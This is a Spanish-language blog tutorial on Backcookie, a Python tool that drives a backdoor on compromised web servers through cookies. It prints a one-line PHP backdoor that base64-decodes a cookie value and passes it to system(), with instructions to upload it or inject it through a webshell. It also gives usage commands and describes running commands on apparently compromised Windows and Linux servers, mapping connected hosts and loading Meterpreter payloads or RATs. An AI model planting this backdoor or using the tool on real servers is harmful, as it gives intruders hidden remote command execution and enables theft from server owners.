Backcookie para conexiones entrantes de servidores web mediante cookies

Backcookie una herramienta escrita en python la cual tiene como función tener conexiones entrantes de servidores web mediante cookies, vayamos a la acción.

Backdoors detectable.

¿Que es una Cookie?

Las cookies son un mecanismo por el que se almacenan datos en el navegador remoto para monitorizar o identificar a los usuarios que vuelvan al sito web.

referencia: http://php.net/manual/es/features.cookies.php

Lo que haremos sera descargar la herramienta Backcokkie, luego de ello pasaremos a extraerlo

Código:
root@kali:~# wget https://github.com/jofpin/backcookie/archive/master.zip
Iniciando la herramienta

 

Antes que nada podemos observar como funciona la herramienta, de acuerdo al autor funciona de dos maneras :

Código:
Ejemplo 1: python backcookie.py -u http://target.com/shell.php -c name_cookie
Ejemplo 2: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Métodos de subir el código de conexión

El primer método en un servidor VPS

sera crear un archivo .php añadiendo el codigo y subirlo al servidor web.

Source:
php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"]));

 

El segundo método

seria añadir el código en archivo del servidor web, mediante una webshell.

 

entonces una ves añadido nuestro código, pasaremos ejecutarlo:

 

 

Como podemos observar el dominio comprometido es un servidor privado (VPS), la cual tenemos acceso al sistema del servidor, la cual podemos subir nuestros payload de meterpreter,archivos RAT,o los que ustedes deseen, en mi caso les enseñare a utilizar esta herramienta de manera estándar, en este servidor VPS en Windows como prueba de concepto.

Lo que haremos sera ejecutar el comando CMD

 

como vemos hemos tenido acceso a la interprete de comandos de windows, lo que podemos hacer ahora es ejecutar los comandos que utilizamos siempre, en mi caso haré un mapeo de todas las IP’S conectadas al servidor, en este caso todos los demás servicios privados.

 

como podemos observar nos arroja las IP’S conectadas la cual podemos aprovecharlas para auditarlas y explotarlas mediante metasploit, o subir un archivo RAT y capturar todos los datos del servidor, por mi parte no lo haré, por motivos de ética, de igual manera podemos ver el tipo de servicio del router como veremos aquí:

 

Paremos a entrar a otro servidor web, en este caso el siguiente:

 

Como vemos es un servidor en Linux la cual, podemos interactuar con ella.

Fuente:https://github.com/jofpin/backcookie

#HackNic

Shadow77

 

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *